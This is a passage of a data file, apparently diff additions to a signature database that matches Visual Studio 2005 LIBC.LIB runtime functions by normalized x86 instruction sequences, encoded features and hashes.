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,d39ac6c497fda8a05bf277df01157198633e4edf,VS2005,LIBC.LIB
+_free,"PUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPUSH R32\nJCC CONST",AOHWawAAAAAAAAAAn2kK/wAAAAAAAAAAoR1KRAAAAAAAAAAAkTDPGADh1mss3e1zLN3tc6EdSkSfaQr/,[],2edb560a945a4184821b8c511b64e32f8508ac58,VS2005,LIBC.LIB
+??3@YAXPAX@Z,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,AOHWawAAAAAAAAAAn2kK/wAAAAAAAAAAt1lfvQDh1msAAAAAkTDPGADh1mss3e1zLN3tc7dZX72faQr/,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+__strupr,"PUSH R32\nCALL CONST\nCMP R32,R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",TqCLsQAAAAAAAAAA5JqU9K8h//Rb0BXgIGjjBPwE5oMAAAAA674MnpArzvWBYs5obmOmRfwE5oMgaOMECb5Uda8h//QAAAAA/ATmg06gi7EAAAAAW9AV4K8h//QJvlR1XqODJ06gi7EAAAAAgWLOaE6gi7HkmpT0kCvO9fwE5oMKX6KQCl+ikPwE5oNuY6ZFryH/9OSalPReo4Mn,[],43a053ec52e97e2ecec129f0689a59a534f013c9,VS2005,LIBC.LIB
+__execl,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",fqu4sQAAAAAAAAAA,6V17aHLoOkUAAAAAHV2wR3LoOkVy6DpFjEkn8HLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZEhrUCcug6RUFF0Bu5m+6qzszf5KOqj/HEkqZouZvuqkFF0BsAAAAAQUXQG0L41tYAAAAARIa1AsSSpmjx1sdAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAo6qP8X3NIQcAAAAA8dbHQPQ42DYAAAAAfc0hB2xtJuNLfz7Wcug6RSbu4WVy6DpFcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNs7M3+RNBNpWS38+1n3NIQdeo4MnTQTaVnLoOkXpXXtoXqODJ4xJJ/AAAAAAbG0m44xJJ/AAAAAA,71433449b28941ef118224fe9946dae8a2f75b6b,VS2005,LIBC.LIB
+?_ValidateExecute@@YAHP6GHXZ@Z,"PUSH R32\nPUSH CONST\nPOP R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAHNpU8E+LzAom7uFlJu7hZU+LzAoAAAAA,[],67ed924e68b0aa837df671a1b8c8627c0b81e18f,VS2005,LIBC.LIB
+?_ValidateWrite@@YAHPAXI@Z,"PUSH R32\nPUSH CONST\nPOP R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",wIsRq0+LzAom7uFlT4vMCgAAAAAAAAAAJu7hZU+LzAoAAAAA,[],5012f0191fb0abc36488452297cba5f1f0a79b91,VS2005,LIBC.LIB
+?_ValidateRead@@YAHPBXI@Z,"PUSH R32\nPUSH CONST\nPOP R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAJu7hZU+LzAoAAAAAwIsRq0+LzAom7uFl,[],5012f0191fb0abc36488452297cba5f1f0a79b91,VS2005,LIBC.LIB
+__twoToTOS,"FLD ST\nFRNDINT\nFSUBR ST(1),ST\nFXCH ST(1)\nFCHS\nF2XM1",XtL0mTBkcBQAAAAAMGRwFAAAAAAAAAAAPcJaz17S9JkAAAAA,[],c90d3338d489c33af611318ce3484d5894ed0525,VS2005,LIBC.LIB
+__math_exit,"WAIT\nFSTSW R16\nAND R16,CONST\nJCC CONST",BlvRgwDh1msAAAAAAOHWawAAAAAAAAAA6jKEuAZb0YMQ218zENtfMwZb0YOYWerZmFnq2QAAAAAAAAAAFrN0wgDh1mvqMoS4,[],93946859daa33365907239262380e2a38d304d3b,VS2005,LIBC.LIB
+__convertTOStoQNaN,"FADD QWORD PTR DS:[0]\nMOV R32,CONST\nRETN",yHOnCgAAAAAAAAAA6FWr2kL/d2nIc6cKQv93aQAAAAAAAAAA,[],62b15a8194d1e576cf681a5c3e5e947b40d0546e,VS2005,LIBC.LIB
+__check_range_exit,FLD QWORD PTR DS:[0]\nFXCH ST(1)\nFSCALE\nFSTP ST(1)\nFLD ST\nFABS\nFCOMP QWORD PTR DS:[0]\nWAIT,pIL5ogAAAAAAAAAAUeR0USV+lK7oVavapIL5ogAAAAAAAAAAENtfMwZb0YMqs0LeBlvRgwDh1msAAAAAKrNC3ru2XCwAAAAAAOHWawAAAAAAAAAAJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAA6jKEuAZb0YMQ218z6FWr2iV+lK4Ws3TCFrN0wgDh1mvqMoS4u7ZcLKSC+aKkgvmiJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAA,[],013f82625771ab905d8850a4189559c4ae18780b,VS2005,LIBC.LIB
+__load_CW,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nOR R32,CONST\nMOV WORD PTR SS:[ESP+CONST],R16\nFLDCW WORD PTR SS:[ESP+CONST]\nRETN",VHLLFwAAAAAAAAAA,[],46cbb2df26bd2bfe216c39f4fdce97564cd05e46,VS2005,LIBC.LIB
+__fast_exit,"CMP WORD PTR SS:[ESP],CONST\nJCC CONST",nO5/MADh1msGW9GDAOHWawAAAAAAAAAABlvRgwDh1msAAAAA,[],ba6a423f1d3adc7932f361b9536fb58519d623a2,VS2005,LIBC.LIB
+__check_overflow_exit,FLD QWORD PTR DS:[0]\nFXCH ST(1)\nFSCALE\nFSTP ST(1)\nFLD ST\nFABS\nFCOMP QWORD PTR DS:[0]\nWAIT,pIL5ogAAAAAAAAAAKrNC3ru2XCwAAAAAENtfMwZb0YMqs0LeLsCOFehVq9oAAAAAAOHWawAAAAAAAAAAFrN0wgDh1mvqMoS46FWr2iV+lK4Ws3TC6jKEuAZb0YMQ218zu7ZcLKSC+aKkgvmiJX6Urru2XCwf/P6nH/z+p7u2XCwAAAAApIL5ogAAAAAAAAAABlvRgwDh1msAAAAA,[],11956bdd40c0980c8cec6dd59f3006274fbdceb2,VS2005,LIBC.LIB
+__fload_withFB,"MOV R32,DWORD PTR DS:[R32+CONST]\nSUB ESP,CONST\nOR R32,CONST\nMOV DWORD PTR SS:[ESP+CONST],R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32]\nSHLD R32,R32,CONST\nSHL R32,CONST",aQwXdgAAAAAAAAAAQbrgcDuKCkRpDBd2O4oKRAAAAAAAAAAA,[],03f5c6031d32d4d171bbbd0e57c6e96a1eea9029,VS2005,LIBC.LIB
+__checkTOS_withFB,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,[],34adcba4f0c20fcad44326c6704d9c0d67645a4b,VS2005,LIBC.LIB
+__wwincmdln,"MOV R32,DWORD PTR DS:[0]\nPUSH CONST\nPOP R32\nMOV R16,WORD PTR DS:[R32]\nCMP R16,R16\nJCC CONST",BXWfjwV1n48bLlt/nsgjtFK/h5yM+NV4Gy5bfwGhdbPqMoS4jPjVeJ7II7RSv4ec6jKEuJ2giDMBoXWzUr+HnBsuW3+doIgztFpAmOoyhLieyCO0naCIMxsuW38AAAAAAaF1swAAAAAAAAAA6jKEuBsuW38FdZ+P,[],7038023f0cf136dcea513ab14232ea9dbabe6366,VS2005,LIBC.LIB
+_difftime,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nFILD DWORD PTR SS:[EBP+CONST]\nPOP EBP\nRETN",QmzpvAAAAAAAAAAA,[],cc7387fa569d8b858fe1e1bdf21504bcf27850b2,VS2005,LIBC.LIB
+__wperror,"PUSH R32\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nPOP R32\nMOV R32,DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",PWQhaD/DesUAAAAAS6PAuLO2Rb1y6DpFs7ZFvT/DesUAAAAAFMSIakujwLgXzozNj8sq7T/DesUAAAAAcug6RY/LKu2ztkW9dH2bKz/DesVYgjOQP8N6xQAAAAAAAAAAWIIzkBTEiGo9ZCFoF86MzUujwLgAAAAA,[],9712b3cd182897ecba47ec54c924b316d336fab7,VS2005,LIBC.LIB
+__fltin,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nTEST R8,CONST\nPOP R32",EwOSCAAAAAAAAAAAFAw/gRMDkggAAAAAu7ZcLFvQFeD4RNCx+ETQsRxFpOu7tlws1vk4MiyFDxQUDD+BW9AV4BxFpOu7tlwsLIUPFPhE0LG7tlwsu7ZcLBMDkggcRaTrHEWk6wAAAAAAAAAA,[],d618d0c2ceefe926237d66525b783193e0c9ffaf,VS2005,LIBC.LIB
+__findnexti64,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32",Mg7y5wAAAAAAAAAAWz9DPoPygRm7tlwsmiFd3DIO8udbP0M+KcAj0AAAAAAAAAAAGaZm/ynAI9AAAAAAu7ZcLGqGyxK7tlwsu7ZcLGqGyxKD8oEZu7ZcLBmmZv+7tlwsaobLEinAI9AAAAAAg/KBGSnAI9AAAAAA,[],572cf64849e2ae12bca42cec1e2c4f7ced6bd079,VS2005,LIBC.LIB
+__findfirsti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nSUB R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]",u7ZcLGqGyxK7tlwsGaZm/68nV1wAAAAAu7ZcLBmmZv+7tlwsu7ZcLGqGyxIeGLo5aobLEq8nV1wAAAAAHhi6OU6gi7EAAAAAtmUaEJWwOY1bP0M+Wz9DPh4Yujm7tlwslbA5jQAAAAAAAAAArydXXE6gi7EAAAAATqCLsQAAAAAAAAAA,[],c9d6ac3ffb23028fff48eccfe4c58a02944e513a,VS2005,LIBC.LIB
+__tolower,"MOV R32,DWORD PTR SS:[ESP+CONST]\nADD R32,CONST\nRETN",/0BimwAAAAAAAAAA,[],f10404ac093272d456e961e9aeaa9a93b3bf9ae0,VS2005,LIBC.LIB
+_tolower,"MOVZX R32,BYTE PTR SS:[EBP+CONST]\nMOVZX R32,BYTE PTR SS:[EBP+CONST]\nSHL R32,CONST\nOR R32,R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE",8zH04tnGROAVojFWxndpBw3MwAFy6DpFcug6ReijeD5YK49WEkCIr0L41tZO/QsUWCuPVkL41tYAAAAAYqd6zcZ3aQcAAAAA6KN4PgAAAAAAAAAAfLOf5tnGROANzMABFaIxVnyzn+ZpF9xeDczAAUL41tYAAAAArydXXEL41tYAAAAAa/HwTfMx9OISQIiv2cZE4EcICyhip3rNcug6RdnGROANzMABaRfcXnLoOkUAAAAARwgLKA3MwAFy6DpFQvjW1gAAAAAAAAAATv0LFEL41tavJ1dc,[],c3363bd457610ff36b0848e65357831cfb2cb486,VS2005,LIBC.LIB
+___mbtow_environ,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nMOV EBP,R32\nPOP R32\nTEST EBP,EBP\nJCC CONST",iW00esSSpmgGgcpPg3xWwyuWhYDHqQNfK5aFgMSSpmgGgcpPikVEAsSSpmiDfFbDx6kDXwAAAAAAAAAAqpPdsgAAAAAAAAAAG07RMMepA1+JbTR6xJKmaKqT3bIAAAAABoHKT8SSpmiKRUQC,[],9f9e01ebf43faed997afaa5d8628cf4c7dd13e62,VS2005,LIBC.LIB
+__wremove,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",Us42lQAAAAAAAAAAlVAczHLoOkUAAAAA5FK8n1LONpUIpA1Acug6RVLONpUIpA1ACKQNQAAAAAAAAAAA+RqFzeRSvJ+VUBzM,[],ffdd9a5e165d1578c7fc1487b3f6aecf2c04e64b,VS2005,LIBC.LIB
+__wunlink,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,lVAczHLoOkUAAAAA5FK8n1LONpUIpA1Acug6RVLONpUIpA1ACKQNQAAAAAAAAAAA+RqFzeRSvJ+VUBzMUs42lQAAAAAAAAAA,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+__NLG_Return,"MOV CONST,CONST\nPUSH R32\nCALL CONST\nPOP EBP\nPOP R32\nPOP R32\nLEAVE\nRETN CONST",0dEoTQAAAAAAAAAACPIyYtHRKE3iszlf4rM5XwAAAAAAAAAA,[],bc5687dc06d966ee36456761ef1725db795ee78e,VS2005,LIBC.LIB
+__CallSettingFrame@12,PUSH R32\nCALL CONST\nPOP EBP\nPOP R32\nPOP R32\nLEAVE\nRETN CONST,0dEoTQAAAAAAAAAA2e8PcNHRKE0qs0LeKrNC3tHRKE0AAAAA,[],46f1e4c21b9303c97832448b13c53c3c55a0617f,VS2005,LIBC.LIB
+__mbsbtype,"PUSH R32\nPUSH R32\nINC R32\nCALL CONST\nPOP R32\nPOP R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nDEC DWORD PTR SS:[ESP+CONST]",qkUBfpmisQdPi8wKT4vMCgAAAAAAAAAAmaKxB4/izv0AAAAAXqODJ4/izv0AAAAAJKOZXADh1msAAAAAj+LO/SSjmVwJu97cAOHWawAAAAAAAAAACbve3ADh1mteo4Mn,[],09fb36d3681bbb77d896a84741643ff5f8c4c898,VS2005,LIBC.LIB
+__filelength,"PUSH CONST\nPUSH CONST\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32\nJCC CONST",8aajqyAWOYK0QJLOoTaV65IE5Z88zmEikgTlnwAAAAAAAAAAyisVHCAWOYLxpqOrPM5hIpIE5Z/KKxUctECSzgAAAAAAAAAAIBY5ggAAAAAAAAAA,[],38bae059c760100daac89d13dd69cd9abab6e0cf,VS2005,LIBC.LIB
+__dup2,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[R32]\nSHL CONST2,CONST",lVAczHLoOkUAAAAAq9rqmczfL6WVUBzMiFwj64ejbX1yE5fLVbJ6GUL41tYAAAAArnjSbszfL6WVUBzMh6NtfQ3MwAEkvDPSzN8vpXLoOkUAAAAAgwnXfIZ2O+fR92Tqcug6RVWyehk9ZCFoJKOZXEL41tYAAAAAJLwz0q540m6r2uqZQvjW1gAAAAAAAAAAchOXyySjmVwAAAAA0fdk6oZ2O+fxLPy5cug6RYejbX2IXCPrDczAAUL41tYAAAAA8Sz8uYZ2O+dy6DpFPWQhaCSjmVwAAAAAhnY75ySjmVwAAAAA,[],55328fbad48ef08c1219deb515daa9940361de5d,VS2005,LIBC.LIB
+__gcvt,"SUB R32,R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",Ju7hZWGagYkAAAAAYZqBiWGagYmCP5IeIRhtKlylOYlr5P/Ia+T/yFylOYno/oHQgj+SHoI/kh7Vfx4c6rM3viEYbSoE+z+TBPs/kyEYbSolUXzBXKU5idV/HhyP4s79dIDWdlylOYlr5P/IJVF8wXSA1nYAAAAAj+LO/Sbu4WVb0BXg6P6B0I/izv0AAAAAW9AV4Cbu4WXo/oHQj+LO/VylOYlr5P/I1X8eHAAAAAAAAAAA6P6B0I/izv0AAAAA,[],b7d109a4f96c07846c79a05c362f4937e77bc6c4,VS2005,LIBC.LIB
+__heapused,"MOV DWORD PTR DS:[0],CONST\nXOR R32,R32\nRETN",4/Hb8AAAAAAAAAAA,[],9f635268fbfae8836d58e62be4622b521722b71e,VS2005,LIBC.LIB
+_mbstowcs,"INC R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nINC R32\nDEC DWORD PTR SS:[EBP+CONST]\nTEST R32,R32\nJCC CONST",FaIxVuaZ6PqHo219h6NtfaqT3bK/5Cum5LSDIY/izv3ZSlAEiFqjlY/izv3ZSlAEv+QrpqqT3bKCUEtt2UpQBKqT3bJeo4MnglBLbb/kK6Y1FnITXqODJ3WtSw0AAAAANRZyE6qT3bIAAAAAFaIxVkHZoNFztzs15pno+odHUj8C6H/0c7c7NaqT3bIAAAAAQdmg0XWtSw2HR1I/Auh/9OFv0ed1rUsNh0dSP6qT3bIAAAAAqpPdsgAAAAAAAAAAda1LDaqT3bIAAAAAmadhUBWiMVbbHu7G4W/R59lKUAQCMQLBj+LO/dlKUAQCMQLB2x7uxqqT3bIVojFWAjECwYhao5XktIMh,[],e212a22e83d56b5e713d38d4a953c48ee6f21764,VS2005,LIBC.LIB
+__commit,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nTEST BYTE PTR DS:[R32+R32*8+CONST],CONST\nJCC CONST",2RXZ7uRSvJ+VUBzMKq+9mQAAAAAAAAAAPM5hIiqvvZnZFdnulVAczHLoOkUAAAAAZwxGCQAAAAAAAAAAAaF1swAAAAAAAAAAcug6RQGhdbNnDEYJ5FK8nwGhdbNnDEYJwH/MmSqvvZk8zmEi,[],76ff9c665d8d65135d45b228c500ef2030b8260b,VS2005,LIBC.LIB
+__fgetchar,PUSH CONST\nCALL CONST\nPOP R32\nRETN,xbqAMQAAAAAAAAAAqDCVDwAAAAAAAAAAW9dWdqgwlQ/FuoAx,[],4c0f6e68b79188240c73c1adcdc3a989e0dc4300,VS2005,LIBC.LIB
+_getchar,PUSH CONST\nCALL CONST\nPOP R32\nRETN,xbqAMQAAAAAAAAAAqDCVDwAAAAAAAAAAW9dWdqgwlQ/FuoAxNRZyE1vXVnYAAAAA,[],14d7cd3a2c8e885352515b3ed9289aa8b1b01323,VS2005,LIBC.LIB
+__wopenfile,"PUSH CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nMOV R32,R32\nCMP R32,R32",mqc5dWuDdIwAAAAATmrDzmZ5MTUSfrxXEn68V2uDdIwAAAAAu7ZcLFIoILJO/QsUu7ZcLE5qw85ikSysW9AV4E9BHpBmeTE1W9AV4GZ5MTXEkqZoZnkxNWuDdIwAAAAAxJKmaGuDdIwAAAAAl3FRniSjmVwAAAAAT0EekGuDdIwAAAAAu7ZcLFvQFeCX2nuUUiggsk36bo4AAAAAiINkP2uDdIwAAAAAvkJiwfPggjgNzMABKrNC3iSjmVwAAAAAJKOZXE36bo4AAAAATfpujmuDdIwAAAAAa4N0jL5CYsGHo219W9AV4GZ5MTWIg2Q/ZnkxNWuDdIwAAAAAtN+0CmZ5MTVmeTE1DczAAS6JAm4AAAAAh6Ntfb5CYsEpAdvH8+CCOC6JAm4AAAAAl9p7lLshlPa7tlwsKQHbx7u2XCwhh3lju7ZcLLshlPa7tlwsu7ZcLGZ5MTVb0BXgIYd5Y7TftAq7tlwsu7ZcLFvQFeC7tlwsW9AV4GZ5MTVPQR6QYpEsrGZ5MTVOasPOu7ZcLFvQFeC7tlwsT0EekGuDdIwAAAAALokCbgAAAAAAAAAAuyGU9mZ5MTWapzl1Tv0LFA3MwAGXcVGemqc5dWuDdIwAAAAATmrDzmZ5MTUSfrxXbxaAyCqzQt67tlwsEn68V2uDdIwAAAAAuyGU9mZ5MTWapzl1,[],c8d1915d9fd9ffa718e3aa6a233d4cae5ff8cd02,VS2005,LIBC.LIB
+_fgetwc,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,-1",uZvuqi6JAm4AAAAAOkaY+cVl/HTfE8DlLokCbgAAAAAAAAAA3xPA5bmb7qrEM7R7xDO0e7u2XCwAAAAAB3Of95yGUTjnC9+XnIZROLmb7qqiy95luZvuqru2XCwAAAAAgRlLsP6jj8gAAAAAu7ZcLIYselmBGUuw5wvflxRzrGX3825o6L/s2CiCAZDEM7R79/NuaNJEIioAAAAAhix6WcVl/HQAAAAAxWX8dJZ8m68Zpmb/FHOsZZyGUTjov+zY0kQiKpyGUTjov+zYGaZm//6jj8gAAAAAxDO0e7u2XCwAAAAAlnybry6JAm4AAAAAKIIBkDpGmPn+o4/IosveZS6JAm4AAAAAu7ZcLDpGmPn+o4/I/qOPyC6JAm4AAAAA,[],7f9aadd85182148aad2f96944f28b2484be62037,VS2005,LIBC.LIB
+_getwc,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,6L/s2Lmb7qrEM7R7nIZROLmb7qqiy95lxDO0e7u2XCwAAAAAlnybry6JAm4AAAAAuZvuqru2XCwAAAAA5wvflyqzQt73825oGaZm//6jj8gAAAAAosveZS6JAm4AAAAAu7ZcLDpGmPn+o4/I/qOPyC6JAm4AAAAAuZvuqi6JAm4AAAAAOkaY+cVl/HTfE8DlLokCbgAAAAAAAAAA3xPA5bmb7qrEM7R7xDO0e7u2XCwAAAAAB3Of95yGUTjnC9+XuZvuqru2XCwAAAAAu7ZcLIYselmBGUuwgRlLsP6jj8gAAAAA9/NuaNJEIioAAAAAhix6WcVl/HQAAAAAxWX8dJZ8m68Zpmb/KrNC3tJEIioAAAAA0kQiKpyGUTjov+zY,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+__chdir,"MOVZX R32,R8\nPUSH R32\nMOV BYTE PTR SS:[EBP+CONST],CONST\nCALL CONST\nAND BYTE PTR SS:[EBP+CONST],0\nMOV BYTE PTR SS:[EBP+CONST],R8\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",J2IC+JylLk3f9buMAGgeNpylLk2s37Pm2M0EpgBoHjZRSrnJSGe4gFFKucnYzQSmrN+z5gAAAAAAAAAAnKUuTQAAAAAAAAAA3/W7jJylLk1IZ7iAUUq5yazfs+YAaB42,[],08fbeaa41751fe2d5a2a3f1b667e58504c58d437,VS2005,LIBC.LIB
